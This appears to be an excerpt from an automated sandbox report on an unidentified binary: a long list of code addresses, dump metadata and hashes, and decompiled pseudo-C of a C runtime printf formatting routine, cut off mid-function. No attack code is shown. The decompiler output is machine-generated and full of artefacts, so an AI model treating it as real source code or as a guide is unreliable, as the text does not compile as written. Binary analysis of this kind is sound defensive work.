                            0x00423904
                            0x0042390e
                            0x0042390e
                            0x00423914
                            0x00423916
                            0x00423919
                            0x00423919
                            0x0042391f
                            0x0042391f
                            0x00423922
                            0x00423925
                            0x00423925
                            0x0042392a
                            0x0042394c
                            0x0042394c
                            0x00423952
                            0x00423974
                            0x00423974
                            0x00423977
                            0x004239be
                            0x004239be
                            0x004239c1
                            0x004239de
                            0x004239e2
                            0x004239ea
                            0x004239ea
                            0x004239ec
                            0x004239f2
                            0x004239c3
                            0x004239c3
                            0x004239c7
                            0x004239cf
                            0x004239d0
                            0x004239d6
                            0x004239d6
                            0x00423979
                            0x0042397c
                            0x0042397c
                            0x0042397f
                            0x0042399d
                            0x004239a9
                            0x004239ac
                            0x004239ad
                            0x004239b3
                            0x00423981
                            0x00423981
                            0x00423985
                            0x0042398d
                            0x0042398e
                            0x0042398f
                            0x00423995
                            0x00423995
                            0x004239b9
                            0x00423954
                            0x00423954
                            0x00423960
                            0x00423966
                            0x00423966
                            0x0042392c
                            0x0042392c
                            0x00423938
                            0x0042393e
                            0x0042393e
                            0x004239fb
                            0x004239fb
                            0x004239fe
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004234cd
                            0x004234cd
                            0x004234d1
                            0x004234df
                            0x004234e2
                            0x004234d3
                            0x004234d3
                            0x004234d3
                            0x004234e8
                            0x004234ee
                            0x004234f4
                            0x00423500
                            0x00423506
                            0x00423506
                            0x00423509
                            0x00423591
                            0x00423591
                            0x00423595
                            0x00423597
                            0x0042359d
                            0x0042359d
                            0x004235a0
                            0x004235a7
                            0x004235aa
                            0x004235b0
                            0x004235b0
                            0x004235b0
                            0x004235b6
                            0x004235bc
                            0x004235bf
                            0x004235c5
                            0x004235c7
                            0x00000000
                            0x00000000
                            0x004235c9
                            0x004235c9
                            0x004235cf
                            0x004235d2
                            0x004235d4
                            0x00000000
                            0x00000000
                            0x004235d6
                            0x004235dc
                            0x004235df
                            0x004235df
                            0x004235e7
                            0x004235e7
                            0x004235ed
                            0x004235ed
                            0x004235f2
                            0x00000000
                            0x0042350f
                            0x0042350f
                            0x0042350f
                            0x00423513
                            0x00423515
                            0x0042351a
                            0x0042351a
                            0x0042351d
                            0x00423520
                            0x00423526
                            0x00423538
                            0x00423538
                            0x00423538
                            0x0042353b
                            0x00423541
                            0x00000000
                            0x00000000
                            0x00423543
                            0x00423543
                            0x00423549
                            0x0042354c
                            0x0042354e
                            0x00000000
                            0x00000000
                            0x00423550
                            0x00423550
                            0x00423559
                            0x0042355f
                            0x00423563
                            0x0042356b
                            0x0042356d
                            0x0042356f
                            0x00423575
                            0x00423575
                            0x00423578
                            0x00423578
                            0x00423584
                            0x00423587
                            0x0042352f
                            0x00423532
                            0x00423532
                            0x00423535
                            0x00423535
                            0x0042358f
                            0x004235f5
                            0x00423bb0
                            0x00423bb0
                            0x00423bb0
                            0x00423bb4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423bb4
                            0x00423bb0
                            0x00000000
                            0x004238ad
                            0x004238ad
                            0x00423922
                            0x00423922
                            0x00423925
                            0x00423925
                            0x0042392a
                            0x0042394c
                            0x0042394c
                            0x00423952
                            0x00423974
                            0x00423974
                            0x00423977
                            0x004239be
                            0x004239be
                            0x004239c1
                            0x004239de
                            0x004239e2
                            0x004239ea
                            0x004239ea
                            0x004239ec
                            0x004239f2
                            0x004239c3
                            0x004239c3
                            0x004239c7
                            0x004239cf
                            0x004239d0
                            0x004239d6
                            0x004239d6
                            0x00423979
                            0x0042397c
                            0x0042397c
                            0x0042397f
                            0x0042399d
                            0x004239a9
                            0x004239ac
                            0x004239ad
                            0x004239b3
                            0x00423981
                            0x00423981
                            0x00423985
                            0x0042398d
                            0x0042398e
                            0x0042398f
                            0x00423995
                            0x00423995
                            0x004239b9
                            0x00423954
                            0x00423954
                            0x00423960
                            0x00423966
                            0x00423966
                            0x0042392c
                            0x0042392c
                            0x00423938
                            0x0042393e
                            0x0042393e
                            0x004239fb
                            0x004239fb
                            0x004239fe
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004239fe
                            0x00000000
                            0x004238c9
                            0x004238c9
                            0x004238d3
                            0x004238d3
                            0x004238dd
                            0x004238dd
                            0x004238e3
                            0x004238e5
                            0x004238ea
                            0x004238f4
                            0x004238f4
                            0x004238f7
                            0x004238fb
                            0x004238fb
                            0x00423922
                            0x00423922
                            0x00423925
                            0x00423925
                            0x0042392a
                            0x0042394c
                            0x0042394c
                            0x00423952
                            0x00423974
                            0x00423974
                            0x00423977
                            0x004239be
                            0x004239be
                            0x004239c1
                            0x004239de
                            0x004239e2
                            0x004239ea
                            0x004239ea
                            0x004239ec
                            0x004239f2
                            0x004239c3
                            0x004239c3
                            0x004239c7
                            0x004239cf
                            0x004239d0
                            0x004239d6
                            0x004239d6
                            0x00423979
                            0x0042397c
                            0x0042397c
                            0x0042397f
                            0x0042399d
                            0x004239a9
                            0x004239ac
                            0x004239ad
                            0x004239b3
                            0x00423981
                            0x00423981
                            0x00423985
                            0x0042398d
                            0x0042398e
                            0x0042398f
                            0x00423995
                            0x00423995
                            0x004239b9
                            0x00423954
                            0x00423954
                            0x00423960
                            0x00423966
                            0x00423966
                            0x0042392c
                            0x0042392c
                            0x00423938
                            0x0042393e
                            0x0042393e
                            0x004239fb
                            0x004239fb
                            0x004239fe
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004239fe
                            0x00000000
                            0x00423bb0
                            0x00423bb0
                            0x00423bb0
                            0x00423bb4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423bb4
                            0x00000000
                            0x00000000
                            0x00423139
                            0x00423139
                            0x0042313c
                            0x0042313f
                            0x00000000
                            0x00000000
                            0x00423144
                            0x00423147
                            0x0042314d
                            0x00000000
                            0x00000000
                            0x0042312e
                            0x00423131
                            0x00423134
                            0x00000000
                            0x00000000
                            0x00423123
                            0x00423126
                            0x00423129
                            0x00000000
                            0x00000000
                            0x00423152
                            0x00423152
                            0x00423155
                            0x00423155
                            0x00423158
                            0x00000000
                            0x00000000
                            0x0042315b
                            0x00000000
                            0x00000000
                            0x00422fcb
                            0x00422fcb
                            0x00422fcd
                            0x00422fdb
                            0x00422fcf
                            0x00422fcf
                            0x00422fcf
                            0x00422feb
                            0x00422ff8
                            0x00422ffa
                            0x00422fff
                            0x00423001
                            0x00423006
                            0x0042300b
                            0x0042300d
                            0x00423012
                            0x00423018
                            0x0042301a
                            0x0042301a
                            0x00423018
                            0x0042301b
                            0x00423022
                            0x00000000
                            0x00423024
                            0x00423029
                            0x00423045
                            0x0042304d
                            0x0042305a
                            0x0042305f
                            0x00423e74
                            0x00423e81
                            0x00423e81
                            0x00423022
                            0x00422fc5
                            0x00423db0
                            0x00423db0
                            0x00423db7
                            0x00423dce
                            0x00423dce
                            0x00423dd8
                            0x00423dd8
                            0x00423dde
                            0x00423de4
                            0x00423deb
                            0x00423ded
                            0x00423df2
                            0x00423df4
                            0x00423df9
                            0x00423dfe
                            0x00423e00
                            0x00423e05
                            0x00423e08
                            0x00423e0b
                            0x00423e0d
                            0x00423e0d
                            0x00423e0b
                            0x00423e0e
                            0x00423e15
                            0x00423e60
                            0x00423e69
                            0x00423e6e
                            0x00423e17
                            0x00423e1c
                            0x00423e38
                            0x00423e40
                            0x00423e4d
                            0x00423e52
                            0x00423e52
                            0x00000000
                            0x00423e15
                            0x00423db9
                            0x00423db9
                            0x00423dc0
                            0x00000000
                            0x00000000
                            0x00423dc2
                            0x00423dc2
                            0x00000000
                            0x00423dc2
                            0x00423bb0
                            0x00423b87
                            0x00423b87
                            0x00423b8b
                            0x00423b98
                            0x00423b9b
                            0x00423b9e
                            0x00423ba1
                            0x00423ba4
                            0x00423ba7
                            0x00423baa
                            0x00423baa
                            0x00423bad
                            0x00000000
                            0x00423bad
                            0x00423b8d
                            0x00423b8d
                            0x00423b90
                            0x00423b93
                            0x00423b96
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423b96
                            0x00423aec
                            0x00423aec
                            0x00423aef
                            0x00423af2
                            0x00423af9
                            0x00423b00
                            0x00423b08
                            0x00423b0e
                            0x00423b11
                            0x00423b14
                            0x00423b1b
                            0x00423b27
                            0x00423b2d
                            0x00423b33
                            0x00423b3a
                            0x00423b3c
                            0x00423b42
                            0x00423b42
                            0x00423b48
                            0x00423b48
                            0x00423b4e
                            0x00423b57
                            0x00423b5c
                            0x00423b5f
                            0x00423ace
                            0x00423ace
                            0x00423ad4
                            0x00423ad7
                            0x00423ada
                            0x00423adc
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423adc
                            0x00423ace
                            0x00423a0b
                            0x00423a0b
                            0x00423a12
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423a40
                            0x00423a40
                            0x00423a46
                            0x00423a4c
                            0x00423a52
                            0x00000000
                            0x00423a52
                            0x00423922
                            0x004238d3
                            0x004238bd

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: __aulldiv__aullrem_get_int64_arg
                            • String ID: 9
                            • API String ID: 3120068967-2366072709
                            • Opcode ID: 80f36c88f3207dc5ac16add0bc50c7bc1b6018536e32127ad29bdd8e33f80b18
                            • Instruction ID: ca625eec5cf81ee750f24a248bbce6e54f1b23b380aee365a15d8d23c67969aa
                            • Opcode Fuzzy Hash: 80f36c88f3207dc5ac16add0bc50c7bc1b6018536e32127ad29bdd8e33f80b18
                            • Instruction Fuzzy Hash: 6C4128B1E101299FDB24CF48D881BAEB7B5FF85315F5040AAE289AB241C7785E81CF59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 69%
                            			E0042205C(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi) {
                            				signed int _t496;
                            				signed int _t518;
                            				void* _t523;
                            				signed int _t525;
                            				void* _t545;
                            				signed int _t563;
                            				signed int _t576;
                            				signed int _t580;
                            				signed short _t581;
                            				signed int _t584;
                            				signed int _t587;
                            				signed int _t588;
                            				intOrPtr _t589;
                            				signed int _t611;
                            				signed int _t639;
                            				signed int _t647;
                            				signed int _t649;
                            				signed int _t651;
                            				signed int _t658;
                            				signed int _t662;
                            				signed int _t698;
                            				intOrPtr _t699;
                            				intOrPtr _t700;
                            				signed int _t701;
                            				void* _t703;
                            
                            				L0:
                            				while(1) {
                            					L0:
                            					_t700 = __esi;
                            					_t699 = __edi;
                            					_t589 = __ebx;
                            					 *(_t701 - 8) = 8;
                            					if(( *(_t701 - 0x10) & 0x00000080) != 0) {
                            						__edx =  *(__ebp - 0x10);
                            						__edx =  *(__ebp - 0x10) | 0x00000200;
                            						__eflags = __edx;
                            						 *(__ebp - 0x10) = __edx;
                            					}
                            					while(1) {
                            						L153:
                            						__eflags =  *(_t701 - 0x10) & 0x00008000;
                            						if(( *(_t701 - 0x10) & 0x00008000) == 0) {
                            							_t649 =  *(_t701 - 0x10) & 0x00001000;
                            							__eflags = _t649;
                            							if(_t649 == 0) {
                            								__eflags =  *(_t701 - 0x10) & 0x00000020;
                            								if(( *(_t701 - 0x10) & 0x00000020) == 0) {
                            									_t651 =  *(_t701 - 0x10) & 0x00000040;
                            									__eflags = _t651;
                            									if(_t651 == 0) {
                            										_t496 = E0041C290(_t701 + 0x14);
                            										_t703 = _t703 + 4;
                            										__eflags = 0;
                            										 *(_t701 - 0x2b8) = _t496;
                            										 *(_t701 - 0x2b4) = 0;
                            									} else {
                            										_t580 = E0041C290(_t701 + 0x14);
                            										_t703 = _t703 + 4;
                            										asm("cdq");
                            										 *(_t701 - 0x2b8) = _t580;
                            										 *(_t701 - 0x2b4) = _t651;
                            									}
                            								} else {
                            									_t698 =  *(_t701 - 0x10) & 0x00000040;
                            									__eflags = _t698;
                            									if(_t698 == 0) {
                            										_t581 = E0041C290(_t701 + 0x14);
                            										_t703 = _t703 + 4;
                            										asm("cdq");
                            										 *(_t701 - 0x2b8) = _t581 & 0x0000ffff;
                            										 *(_t701 - 0x2b4) = _t698;
                            									} else {
                            										_t584 = E0041C290(_t701 + 0x14);
                            										_t703 = _t703 + 4;
                            										asm("cdq");
                            										 *(_t701 - 0x2b8) = _t584;
                            										 *(_t701 - 0x2b4) = _t698;
                            									}
                            								}
                            							} else {
                            								_t587 = E0041C2B0(_t701 + 0x14);
                            								_t703 = _t703 + 4;
                            								 *(_t701 - 0x2b8) = _t587;
                            								 *(_t701 - 0x2b4) = _t649;
                            							}
                            						} else {
                            							_t588 = E0041C2B0(_t701 + 0x14);
                            							_t703 = _t703 + 4;
                            							 *(_t701 - 0x2b8) = _t588;
                            							 *(_t701 - 0x2b4) = _t647;
                            						}
                            						__eflags =  *(_t701 - 0x10) & 0x00000040;
                            						if(( *(_t701 - 0x10) & 0x00000040) == 0) {
                            							goto L170;
                            						}
                            						L166:
                            						__eflags =  *(_t701 - 0x2b4);
                            						if(__eflags > 0) {
                            							goto L170;
                            						}
                            						L167:
                            						if(__eflags < 0) {
                            							L169:
                            							asm("adc edx, 0x0");
                            							 *(_t701 - 0x2c0) =  ~( *(_t701 - 0x2b8));
                            							 *(_t701 - 0x2bc) =  ~( *(_t701 - 0x2b4));
                            							 *(_t701 - 0x10) =  *(_t701 - 0x10) | 0x00000100;
                            							L171:
                            							__eflags =  *(_t701 - 0x10) & 0x00008000;
                            							if(( *(_t701 - 0x10) & 0x00008000) == 0) {
                            								__eflags =  *(_t701 - 0x10) & 0x00001000;
                            								if(( *(_t701 - 0x10) & 0x00001000) == 0) {
                            									_t576 =  *(_t701 - 0x2bc) & 0x00000000;
                            									__eflags = _t576;
                            									 *(_t701 - 0x2bc) = _t576;
                            								}
                            							}
                            							__eflags =  *(_t701 - 0x30);
                            							if( *(_t701 - 0x30) >= 0) {
                            								 *(_t701 - 0x10) =  *(_t701 - 0x10) & 0xfffffff7;
                            								__eflags =  *(_t701 - 0x30) - 0x200;
                            								if( *(_t701 - 0x30) > 0x200) {
                            									 *(_t701 - 0x30) = 0x200;
                            								}
                            							} else {
                            								 *(_t701 - 0x30) = 1;
                            							}
                            							__eflags =  *(_t701 - 0x2c0) |  *(_t701 - 0x2bc);
                            							if(( *(_t701 - 0x2c0) |  *(_t701 - 0x2bc)) == 0) {
                            								 *(_t701 - 0x1c) = 0;
                            							}
                            							 *((intOrPtr*)(_t701 - 4)) = _t701 - 0x49;
                            							while(1) {
                            								L181:
                            								_t657 =  *(_t701 - 0x30) - 1;
                            								 *(_t701 - 0x30) =  *(_t701 - 0x30) - 1;
                            								__eflags =  *(_t701 - 0x30);
                            								if( *(_t701 - 0x30) > 0) {
                            									goto L183;
                            								}
                            								L182:
                            								__eflags =  *(_t701 - 0x2c0) |  *(_t701 - 0x2bc);
                            								if(( *(_t701 - 0x2c0) |  *(_t701 - 0x2bc)) == 0) {
                            									L186:
                            									 *(_t701 - 0x24) = _t701 - 0x49 -  *((intOrPtr*)(_t701 - 4));
                            									 *((intOrPtr*)(_t701 - 4)) =  *((intOrPtr*)(_t701 - 4)) + 1;
                            									__eflags =  *(_t701 - 0x10) & 0x00000200;
                            									if(( *(_t701 - 0x10) & 0x00000200) == 0) {
                            										while(1) {
                            											L190:
                            											__eflags =  *(_t701 - 0x28);
                            											if( *(_t701 - 0x28) != 0) {
                            												goto L216;
                            											}
                            											L191:
                            											__eflags =  *(_t701 - 0x10) & 0x00000040;
                            											if(( *(_t701 - 0x10) & 0x00000040) != 0) {
                            												__eflags =  *(_t701 - 0x10) & 0x00000100;
                            												if(( *(_t701 - 0x10) & 0x00000100) == 0) {
                            													__eflags =  *(_t701 - 0x10) & 0x00000001;
                            													if(( *(_t701 - 0x10) & 0x00000001) == 0) {
                            														__eflags =  *(_t701 - 0x10) & 0x00000002;
                            														if(( *(_t701 - 0x10) & 0x00000002) != 0) {
                            															 *((char*)(_t701 - 0x14)) = 0x20;
                            															 *(_t701 - 0x1c) = 1;
                            														}
                            													} else {
                            														 *((char*)(_t701 - 0x14)) = 0x2b;
                            														 *(_t701 - 0x1c) = 1;
                            													}
                            												} else {
                            													 *((char*)(_t701 - 0x14)) = 0x2d;
                            													 *(_t701 - 0x1c) = 1;
                            												}
                            											}
                            											 *((intOrPtr*)(_t701 - 0x2c4)) =  *((intOrPtr*)(_t701 - 0x18)) -  *(_t701 - 0x24) -  *(_t701 - 0x1c);
                            											__eflags =  *(_t701 - 0x10) & 0x0000000c;
                            											if(( *(_t701 - 0x10) & 0x0000000c) == 0) {
                            												E00422790(0x20,  *((intOrPtr*)(_t701 - 0x2c4)),  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
                            												_t703 = _t703 + 0x10;
                            											}
                            											E004227D0( *(_t701 - 0x1c), _t701 - 0x14,  *(_t701 - 0x1c),  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
                            											_t703 = _t703 + 0x10;
                            											__eflags =  *(_t701 - 0x10) & 0x00000008;
                            											if(( *(_t701 - 0x10) & 0x00000008) != 0) {
                            												__eflags =  *(_t701 - 0x10) & 0x00000004;
                            												if(( *(_t701 - 0x10) & 0x00000004) == 0) {
                            													E00422790(0x30,  *((intOrPtr*)(_t701 - 0x2c4)),  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
                            													_t703 = _t703 + 0x10;
                            												}
                            											}
                            											__eflags =  *(_t701 - 0xc);
                            											if( *(_t701 - 0xc) == 0) {
                            												L212:
                            												E004227D0( *((intOrPtr*)(_t701 - 4)),  *((intOrPtr*)(_t701 - 4)),  *(_t701 - 0x24),  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
                            												_t703 = _t703 + 0x10;
                            												goto L213;
                            											} else {
                            												L204:
                            												__eflags =  *(_t701 - 0x24);
                            												if( *(_t701 - 0x24) <= 0) {
                            													goto L212;
                            												}
                            												L205:
                            												 *(_t701 - 0x2dc) = 0;
                            												 *((intOrPtr*)(_t701 - 0x2c8)) =  *((intOrPtr*)(_t701 - 4));
                            												 *(_t701 - 0x2cc) =  *(_t701 - 0x24);
                            												while(1) {
                            													L206:
                            													 *(_t701 - 0x2cc) =  *(_t701 - 0x2cc) - 1;
                            													__eflags =  *(_t701 - 0x2cc);
                            													if( *(_t701 - 0x2cc) == 0) {
                            														break;
                            													}
                            													L207:
                            													 *(_t701 - 0x32e) =  *((intOrPtr*)( *((intOrPtr*)(_t701 - 0x2c8))));
                            													_t563 = E004212A0(_t701 - 0x2d0, _t701 - 0x2d8, 6,  *(_t701 - 0x32e) & 0x0000ffff);
                            													_t703 = _t703 + 0x10;
                            													 *(_t701 - 0x2dc) = _t563;
                            													 *((intOrPtr*)(_t701 - 0x2c8)) =  *((intOrPtr*)(_t701 - 0x2c8)) + 2;
                            													__eflags =  *(_t701 - 0x2dc);
                            													if( *(_t701 - 0x2dc) != 0) {
                            														L209:
                            														 *(_t701 - 0x24c) = 0xffffffff;
                            														break;
                            													}
                            													L208:
                            													__eflags =  *(_t701 - 0x2d0);
                            													if( *(_t701 - 0x2d0) != 0) {
                            														L210:
                            														E004227D0( *((intOrPtr*)(_t701 + 8)), _t701 - 0x2d8,  *(_t701 - 0x2d0),  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
                            														_t703 = _t703 + 0x10;
                            														continue;
                            													}
                            													goto L209;
                            												}
                            												L211:
                            												L213:
                            												__eflags =  *(_t701 - 0x24c);
                            												if( *(_t701 - 0x24c) >= 0) {
                            													__eflags =  *(_t701 - 0x10) & 0x00000004;
                            													if(( *(_t701 - 0x10) & 0x00000004) != 0) {
                            														E00422790(0x20,  *((intOrPtr*)(_t701 - 0x2c4)),  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
                            														_t703 = _t703 + 0x10;
                            													}
                            												}
                            											}
                            											L216:
                            											__eflags =  *(_t701 - 0x20);
                            											if( *(_t701 - 0x20) != 0) {
                            												L0040C240( *(_t701 - 0x20), 2);
                            												_t703 = _t703 + 8;
                            												 *(_t701 - 0x20) = 0;
                            											}
                            											while(1) {
                            												L218:
                            												 *(_t701 - 0x251) =  *( *(_t701 + 0xc));
                            												_t665 =  *(_t701 - 0x251);
                            												 *(_t701 + 0xc) =  *(_t701 + 0xc) + 1;
                            												if( *(_t701 - 0x251) == 0 ||  *(_t701 - 0x24c) < 0) {
                            													break;
                            												} else {
                            													if( *(_t701 - 0x251) < 0x20 ||  *(_t701 - 0x251) > 0x78) {
                            														 *(_t701 - 0x310) = 0;
                            													} else {
                            														 *(_t701 - 0x310) =  *( *(_t701 - 0x251) + L"pecifier\", 0)") & 0xf;
                            													}
                            												}
                            												L7:
                            												 *(_t701 - 0x250) =  *(_t701 - 0x310);
                            												_t525 =  *(_t701 - 0x250) * 9;
                            												_t611 =  *(_t701 - 0x25c);
                            												_t665 = ( *(_t525 + _t611 + 0x4083d0) & 0x000000ff) >> 4;
                            												 *(_t701 - 0x25c) = ( *(_t525 + _t611 + 0x4083d0) & 0x000000ff) >> 4;
                            												if( *(_t701 - 0x25c) != 8) {
                            													L16:
                            													 *(_t701 - 0x318) =  *(_t701 - 0x25c);
                            													__eflags =  *(_t701 - 0x318) - 7;
                            													if( *(_t701 - 0x318) > 7) {
                            														continue;
                            													}
                            													L17:
                            													switch( *((intOrPtr*)( *(_t701 - 0x318) * 4 +  &M004225E0))) {
                            														case 0:
                            															L18:
                            															 *(_t701 - 0xc) = 0;
                            															_t528 = E00419390( *(_t701 - 0x251) & 0x000000ff, E0040D3B0(_t701 - 0x40));
                            															_t706 = _t703 + 8;
                            															__eflags = _t528;
                            															if(_t528 == 0) {
                            																L24:
                            																E004226F0( *(_t701 - 0x251) & 0x000000ff,  *(_t701 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
                            																_t703 = _t706 + 0xc;
                            																goto L218;
                            															} else {
                            																E004226F0( *((intOrPtr*)(_t701 + 8)),  *(_t701 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
                            																_t706 = _t706 + 0xc;
                            																_t616 =  *( *(_t701 + 0xc));
                            																 *(_t701 - 0x251) =  *( *(_t701 + 0xc));
                            																_t665 =  *(_t701 + 0xc) + 1;
                            																__eflags = _t665;
                            																 *(_t701 + 0xc) = _t665;
                            																asm("sbb eax, eax");
                            																 *(_t701 - 0x27c) =  ~( ~( *(_t701 - 0x251)));
                            																if(_t665 == 0) {
                            																	_push(L"(ch != _T(\'\\0\'))");
                            																	_push(0);
                            																	_push(0x486);
                            																	_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            																	_push(2);
                            																	_t540 = L0040E1A0();
                            																	_t706 = _t706 + 0x14;
                            																	__eflags = _t540 - 1;
                            																	if(_t540 == 1) {
                            																		asm("int3");
                            																	}
                            																}
                            																L22:
                            																__eflags =  *(_t701 - 0x27c);
                            																if( *(_t701 - 0x27c) != 0) {
                            																	goto L24;
                            																} else {
                            																	 *((intOrPtr*)(L0040EC70(_t616))) = 0x16;
                            																	E00411A50(_t589, _t616, _t699, _t700, L"(ch != _T(\'\\0\'))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x486, 0);
                            																	 *(_t701 - 0x2f4) = 0xffffffff;
                            																	E0040D380(_t701 - 0x40);
                            																	_t518 =  *(_t701 - 0x2f4);
                            																	goto L229;
                            																}
                            															}
                            														case 1:
                            															L25:
                            															 *(__ebp - 0x2c) = 0;
                            															__edx =  *(__ebp - 0x2c);
                            															 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                            															__eax =  *(__ebp - 0x28);
                            															 *(__ebp - 0x18) =  *(__ebp - 0x28);
                            															__ecx =  *(__ebp - 0x18);
                            															 *(__ebp - 0x1c) = __ecx;
                            															 *(__ebp - 0x10) = 0;
                            															 *(__ebp - 0x30) = 0xffffffff;
                            															 *(__ebp - 0xc) = 0;
                            															goto L218;
                            														case 2:
                            															L26:
                            															__edx =  *((char*)(__ebp - 0x251));
                            															 *(__ebp - 0x31c) =  *((char*)(__ebp - 0x251));
                            															 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
                            															 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
                            															__eflags =  *(__ebp - 0x31c) - 0x10;
                            															if( *(__ebp - 0x31c) > 0x10) {
                            																goto L33;
                            															}
                            															L27:
                            															__ecx =  *(__ebp - 0x31c);
                            															_t73 = __ecx + 0x422618; // 0x498d04
                            															__edx =  *_t73 & 0x000000ff;
                            															switch( *((intOrPtr*)(( *_t73 & 0x000000ff) * 4 +  &M00422600))) {
                            																case 0:
                            																	goto L30;
                            																case 1:
                            																	goto L31;
                            																case 2:
                            																	goto L29;
                            																case 3:
                            																	goto L28;
                            																case 4:
                            																	goto L32;
                            																case 5:
                            																	goto L33;
                            															}
                            														case 3:
                            															L34:
                            															__edx =  *((char*)(__ebp - 0x251));
                            															__eflags =  *((char*)(__ebp - 0x251)) - 0x2a;
                            															if( *((char*)(__ebp - 0x251)) != 0x2a) {
                            																__eax =  *(__ebp - 0x18);
                            																__eax =  *(__ebp - 0x18) * 0xa;
                            																__eflags = __eax;
                            																__ecx =  *((char*)(__ebp - 0x251));
                            																_t97 = __ecx - 0x30; // -48
                            																__edx = __eax + _t97;
                            																 *(__ebp - 0x18) = __eax + _t97;
                            															} else {
                            																__eax = __ebp + 0x14;
                            																 *(__ebp - 0x18) = E0041C290(__ebp + 0x14);
                            																__eflags =  *(__ebp - 0x18);
                            																if( *(__ebp - 0x18) < 0) {
                            																	__ecx =  *(__ebp - 0x10);
                            																	__ecx =  *(__ebp - 0x10) | 0x00000004;
                            																	__eflags = __ecx;
                            																	 *(__ebp - 0x10) = __ecx;
                            																	 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
                            																	 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
                            																}
                            															}
                            															goto L218;
                            														case 4:
                            															L40:
                            															 *(__ebp - 0x30) = 0;
                            															goto L218;
                            														case 5:
                            															L41:
                            															__eax =  *((char*)(__ebp - 0x251));
                            															__eflags =  *((char*)(__ebp - 0x251)) - 0x2a;
                            															if( *((char*)(__ebp - 0x251)) != 0x2a) {
                            																__edx =  *(__ebp - 0x30);
                            																__edx =  *(__ebp - 0x30) * 0xa;
                            																__eflags = __edx;
                            																_t108 =  *((char*)(__ebp - 0x251)) - 0x30; // -48
                            																__ecx = __edx + _t108;
                            																 *(__ebp - 0x30) = __ecx;
                            															} else {
                            																__ecx = __ebp + 0x14;
                            																 *(__ebp - 0x30) = E0041C290(__ebp + 0x14);
                            																__eflags =  *(__ebp - 0x30);
                            																if( *(__ebp - 0x30) < 0) {
                            																	 *(__ebp - 0x30) = 0xffffffff;
                            																}
                            															}
                            															goto L218;
                            														case 6:
                            															L47:
                            															__edx =  *((char*)(__ebp - 0x251));
                            															 *(__ebp - 0x320) =  *((char*)(__ebp - 0x251));
                            															 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
                            															 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
                            															__eflags =  *(__ebp - 0x320) - 0x2e;
                            															if( *(__ebp - 0x320) > 0x2e) {
                            																L70:
                            																goto L218;
                            															}
                            															L48:
                            															__ecx =  *(__ebp - 0x320);
                            															_t116 = __ecx + 0x422640; // 0x1e4e9003
                            															__edx =  *_t116 & 0x000000ff;
                            															switch( *((intOrPtr*)(( *_t116 & 0x000000ff) * 4 +  &M0042262C))) {
                            																case 0:
                            																	L53:
                            																	__edx =  *(__ebp + 0xc);
                            																	__eax =  *( *(__ebp + 0xc));
                            																	__eflags =  *( *(__ebp + 0xc)) - 0x36;
                            																	if( *( *(__ebp + 0xc)) != 0x36) {
                            																		L56:
                            																		__edx =  *(__ebp + 0xc);
                            																		__eax =  *( *(__ebp + 0xc));
                            																		__eflags =  *( *(__ebp + 0xc)) - 0x33;
                            																		if( *( *(__ebp + 0xc)) != 0x33) {
                            																			L59:
                            																			__edx =  *(__ebp + 0xc);
                            																			__eax =  *( *(__ebp + 0xc));
                            																			__eflags =  *( *(__ebp + 0xc)) - 0x64;
                            																			if( *( *(__ebp + 0xc)) == 0x64) {
                            																				L65:
                            																				L67:
                            																				goto L70;
                            																			}
                            																			L60:
                            																			__ecx =  *(__ebp + 0xc);
                            																			__edx =  *__ecx;
                            																			__eflags =  *__ecx - 0x69;
                            																			if( *__ecx == 0x69) {
                            																				goto L65;
                            																			}
                            																			L61:
                            																			__eax =  *(__ebp + 0xc);
                            																			__ecx =  *( *(__ebp + 0xc));
                            																			__eflags = __ecx - 0x6f;
                            																			if(__ecx == 0x6f) {
                            																				goto L65;
                            																			}
                            																			L62:
                            																			__edx =  *(__ebp + 0xc);
                            																			__eax =  *( *(__ebp + 0xc));
                            																			__eflags =  *( *(__ebp + 0xc)) - 0x75;
                            																			if( *( *(__ebp + 0xc)) == 0x75) {
                            																				goto L65;
                            																			}
                            																			L63:
                            																			__ecx =  *(__ebp + 0xc);
                            																			__edx =  *__ecx;
                            																			__eflags =  *__ecx - 0x78;
